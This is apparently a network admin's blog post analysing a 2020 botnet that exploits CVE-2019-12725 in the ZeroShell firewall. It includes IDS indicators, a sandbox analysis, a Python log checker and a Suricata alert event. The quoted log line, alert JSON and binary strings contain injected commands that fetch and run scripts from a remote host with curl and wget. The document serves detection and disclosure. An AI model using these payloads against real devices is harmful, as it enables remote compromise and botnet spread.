A New Botnet is Targeting Network Infrastructure

Starting a little less than two weeks ago, my IDS sensors have been detecting the spread of a new botnet. Unlike previous Mirai botnets, this appears to specifically target the GNU/Linux firewall distribution, “ZeroShell”. While it’s not especially dangerous as far as botnets are concerned, it does appear to be rather vigorous when it sends probes.

However, we got lucky this time. Just as quickly as it appeared, the C&C server went offline, stopping the spread of this worm dead in its tracks. Still, this serves as a useful lesson to every network admin: patch soon; patch often.

CVEs

This particular exploit targets CVE-2019-12725, a CVSS 9.8 vulnerability in the HTTP parser that can lead to remote code execution via a crafted GET request. Though this is a (fairly) old vulnerability, attackers have been working hard recently to exploit unpatched devices.

The maintainers of ZeroShell have also addressed this vulnerability on their official blog. The CVE and the subsequent blog post are both nearly a year old at this point, so most devices should have been patched by now.

Exploit

According to my Elasticsearch database, the first hit on my home server was on 2020/07/20 and originated from Guangzhou, China. However, the first time an alert was generated was 2020/07/25. This makes sense, since the ET rule that identified this exploit (id 1:2030597) was only created on 2020/07/24.

Since then, I have observed exploitation attempts from over 50 unique IPs in China, Russia, South Korea, Canada, the UK, Norway, and the United States. At this point, it’s safe to say this is a widespread issue, limited only by the size of the ZeroShell user community.

Indicators

An exploitation attempt will likely leave a line like this in your HTTPD logs:

183.60.213.205 - - [20/Jul/2020:09:03:23 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 301 178 "-" "-"
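As an added example (not part of the original post), here is a small Python checker that applies the indicator above to combined-format access logs: it parses each line, decodes the kerbynet query string without letting the parser split on the `;` the payload relies on, flags requests whose type parameter carries shell metacharacters, and pulls out the URL the payload tries to fetch. The sample log embeds the line quoted above plus two constructed benign lines; the log format and the 192.0.2.x addresses are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Combined-format access log line: client, identd, user, [time], "request", status, size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]+" '
                    r'(?P<status>\d{3}) \S+')
SHELL_META = re.compile(r'[;|&`$]|\b(curl|wget|sh)\b')  # never valid in an x509List 'type'
FETCH_URL = re.compile(r'https?://[^\s;"\']+')

def parse_query(query):
    """Split on '&' only, then percent-decode. parse_qs on older Pythons also splits on
    ';', which is exactly the separator this payload relies on, so it is avoided here."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params

def check_line(line):
    """Return a finding dict if the line looks like a CVE-2019-12725 attempt, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != "/cgi-bin/kerbynet":
        return None
    q = parse_query(parts.query)
    if q.get("Section") != "NoAuthREQ" or q.get("Action") != "x509List":
        return None  # only the unauthenticated x509List branch is of interest here
    payload = q.get("type", "")
    if not SHELL_META.search(payload):
        return None
    return {"src_ip": m.group("ip"), "time": m.group("ts"), "status": int(m.group("status")),
            "payload": payload, "fetch_urls": FETCH_URL.findall(payload)}

def scan(lines):
    """All findings in an iterable of log lines, in order."""
    return [f for f in map(check_line, lines) if f]

# Sample log: the first line is the hit quoted in the post; the other two are constructed
SAMPLE_LOG = [
    '183.60.213.205 - - [20/Jul/2020:09:03:23 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 301 178 "-" "-"',
    '192.0.2.10 - - [25/Jul/2020:08:00:01 -0400] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=CA HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [25/Jul/2020:08:00:02 -0400] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["src_ip"], "->", finding["fetch_urls"])
```

The extracted fetch URLs are what you would block at the perimeter and hunt for in proxy logs; a 301 in the status field, as in the hit above, does not tell you whether the command actually ran.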

Chasing down the exploit was rather interesting. Soon after discovering this malware, I submitted a sample to CrowdStrike’s free sandbox (Hybrid Analysis):

https://www.hybrid-analysis.com/sample/18c164f8a12e26fa7960feb35e762b5c34d223e75b5d0b22c8736bb875041d07/5f11f67622e86b52232a7f8a

The first stage is a simple bash script that attempts to download and run various payloads depending on the CPU architecture (MIPS, ARM, x86, etc.). The second-stage malware is then downloaded. I analyzed the x86 version, since it runs easily inside the sandbox environment:

https://www.hybrid-analysis.com/sample/6027d9ec503f69dbb58560a63e6acd62d7ab93f36bf8f676d282394a0e55be95/5f1203b1c5a55050bc05ffb4

Interesting content

The executable is a statically linked, stripped ELF binary. Looking inside it, there are some interesting strings:

 shell:cd /data/local/tmp; busybox wget http://5.206.227.228/wget -O -> wwww; sh wwww; curl -O http://5.206.227.228/curl; sh curl; rm wwww curl

This command downloads two additional scripts from the same server, wget (saved locally as wwww) and curl. Despite the familiar names, these are malware scripts, not the real utilities. Unfortunately, by the time I noticed these, the server had been taken down or blocked.

Also contained in the binary is a link to a YouTube video titled “NOW YOU FUCKED UP”: https://www.youtube.ru/watch?v=OGp9P6QvMjY

I am not sure if the creator of the video is at all affiliated with this malware sample, and I won’t speculate.

Stroke of Luck

Thankfully, the server that was distributing the malware quickly went offline.

Today the server appears to be dormant, at least according to Shodan: https://www.shodan.io/host/5.206.227.228

Fortunately, the binaries analyzed had the IP address hardcoded, meaning that already-infected hosts won’t spread the worm any further.

Full Event Details

A sample event is provided:

{
  "_index": "logstash-2020.07",
  "_type": "doc",
  "_id": "xxxx",
  "_version": 1,
  "_score": null,
  "_source": {
    "dest_port": 80,
    "tags": [
    ],
    "log": {
      "file": {
        "path": "/var/log/suricata/eve.json"
      }
    },
    "beat": {
      "version": "6.8.10",
      "hostname": "fw",
      "name": "fw"
    },
    "app_proto": "http",
    "source": "/var/log/suricata/eve.json",
    "tx_id": 0,
    "timestamp": "2020-07-25T08:14:37.117055-0400",
    "flow_id": 0000000,
    "host": {
      "name": "fw"
    },
    "offset": 0000000,
    "flow": {
      "pkts_toserver": 4,
      "bytes_toserver": 390,
      "bytes_toclient": 566,
      "pkts_toclient": 4,
      "start": "2020-07-25T08:14:36.413400-0400"
    },
    "@timestamp": "2020-07-25T12:14:38.095Z",
    "proto": "TCP",
    "prospector": {
      "type": "log"
    },
    "alert": {
      "metadata": {
        "deployment": [
          "Perimeter"
        ],
        "former_category": [
          "MALWARE"
        ],
        "performance_impact": [
          "Low"
        ],
        "signature_severity": [
          "Major"
        ],
        "updated_at": [
          "2020_07_24"
        ],
        "created_at": [
          "2020_07_24"
        ],
        "attack_target": [
          "Networking_Equipment"
        ]
      },
      "category": "Attempted Administrator Privilege Gain",
      "action": "allowed",
      "rev": 2,
      "signature_id": 2030597,
      "gid": 1,
      "signature": "ET EXPLOIT [401TRG] ZeroShell RCE Inbound (CVE-2019-12725)",
      "severity": 1
    },
    "src_ip": "183.60.213.205",
    "@version": "1",
    "src_port": 5157,
    "event_type": "alert",
    "stream": 1,
    "input": {
      "type": "log"
    },
    "in_iface": "eth0",
    "http": {
      "url": "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22",
      "http_method": "GET",
      "protocol": "HTTP/1.0",
      "length": 0
    },
    "geoip": {
      "city_name": "Guangzhou",
      "location": {
        "lon": 113.25,
        "lat": 23.1167
      },
      "country_name": "China",
      "region_code": "44",
      "ip": "183.60.213.205",
      "region_name": "Guangdong",
      "country_code3": "CN",
      "timezone": "Asia/Shanghai",
      "longitude": 113.25,
      "continent_code": "AS",
      "latitude": 23.1167,
      "country_code2": "CN"
    },
    "dest_ip": "10.x.x.x"
  },
  "fields": {
    "flow.start": [
      "2020-07-25T12:14:36.413Z"
    ],
    "@timestamp": [
      "2020-07-25T12:14:38.095Z"
    ]
  },
  "highlight": {
    "event_type": [
      "@kibana-highlighted-field@alert@/kibana-highlighted-field@"
    ],
    "http.url": [
      "/cgi-bin/@kibana-highlighted-field@kerbynet@/kibana-highlighted-field@?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22"
    ]
  },
  "sort": [
    1595679278095
  ]
}